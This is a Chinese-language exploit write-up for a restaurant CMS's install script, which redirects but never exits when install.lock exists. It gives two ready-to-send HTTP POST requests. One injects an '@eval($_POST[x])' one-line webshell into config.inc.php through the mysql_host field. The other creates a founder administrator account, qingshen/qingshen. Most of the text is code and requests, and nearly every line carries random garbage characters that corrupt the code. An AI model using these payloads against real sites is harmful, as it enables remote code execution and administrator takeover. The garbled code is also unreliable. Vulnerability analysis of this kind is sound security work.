口福科技餐厅cms漏洞(可getshell)

admin

问题出在/install/index.php文件。在程序安装完后，会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
- b) l; y+ E: u0 J2 |2 B1 w
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../");//没有退出
- T$ |9 Z! S$ z. X6 C1 r: ]; g}
               
//echo 'tst';exit;
9 Q+ V( o3 R0 Xrequire_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
可见在/install/index.php存在时，只是header做了302重定向并没有退出，也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。

1、getshell（很危险）
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
# |& Z& d( S& w/ I/ ~0 v* P8 ]{
$smarty->assign("step",1);
6 S1 T4 j0 w4 L1 s$smarty->display("index.html");
4 E1 |/ M2 h; O: [. Y: `}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
$ S! G  Y, V% f/ V' L/ H/ o& Z    $mysql_pwd=trim($_POST['mysql_pwd']);
  w1 s! M( C, X8 ]    $mysql_db=trim($_POST['mysql_db']);
" S( b8 I& w! D1 L    $tblpre=trim($_POST['tblpre']);
3 j, E: \! [$ n" t: ?) u    $domain==trim($_POST['domain']);
    $str="<?php \r\n";
0 Y! {5 V: x2 p4 J    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
, K+ \  e9 T' g" ?% J! x5 O    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
& ~9 a8 F2 I9 u. ^    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
8 z  o! M. I0 W" }    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
上面的代码将POST的数据直接写入了../config/config.inc.php文件，那么我们提交如下POST包，即可获得一句话木马
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
9 e) m& w. u/ c" o' c& F. VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
/ ?8 [; N; W# X+ v) j* C" a/ X8 TReferer: http://192.168.80.129/canting/install/index.php?step=1
  Y- w( j+ G9 h& R- _6 HCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
' M% ]& A$ u  z  |, o3 `         
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
/ k" q9 d; B# z7 t  P4 o但是这个方法很危险，将导致网站无法运行。
1 j8 n3 {0 `. J; N6 K0 l  `
2、直接添加管理员
6 z8 ?! j9 r8 X7 [7 S* F+ n2 t4 a! y2 Q
elseif($_REQUEST['step']==5)
{
    if($_POST)
    {   require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
) U9 |* R" t6 l# c# P* L         mysql_query("SET sql_mode=''");

5 C$ B; \1 U) t/ l% A2 ~ $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
" u9 }; U+ G7 q& }        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
- B% c% C2 v3 q        {

echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
% }. P3 Q, T2 c        }
        if(($pwd1!=$pwd2) or empty($pwd1))
9 n1 a) ?1 E; P/ _/ \5 ?$ g0 |        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
% A! j' x0 ?* P: a        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
2 F/ O4 o+ Z+ b' b+ s3 ~/ _    }
  X/ U6 W9 I5 [这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号，语句如下：
( j$ X* ?' J6 Y+ f% O. H5 ]" {POST /canting/install/index.php?m=index&step=5 HTTP/1.1
! s" E+ ?$ W3 u; d5 t+ u! w. cHost: 192.168.80.129
/ ~7 D0 U% ]) ?# B& O. E  j& oUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
8 h1 B# ~* G% w# T! M* `9 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
7 B, m! P8 J5 b) nAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
0 s0 S3 r  q. ?3 y7 I5 VReferer: http://www.2cto.com /canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
, g) `4 G4 \5 O) s2 J) M. f. CContent-Type: application/x-www-form-urlencoded
Content-Length: 46
9 x/ `! p/ L( Z5 q' v" L      
# I) n9 X+ [& E) fadminname=qingshen&pwd1=qingshen&pwd2=qingshen​
  j9 H4 k6 c/ L3 e0 c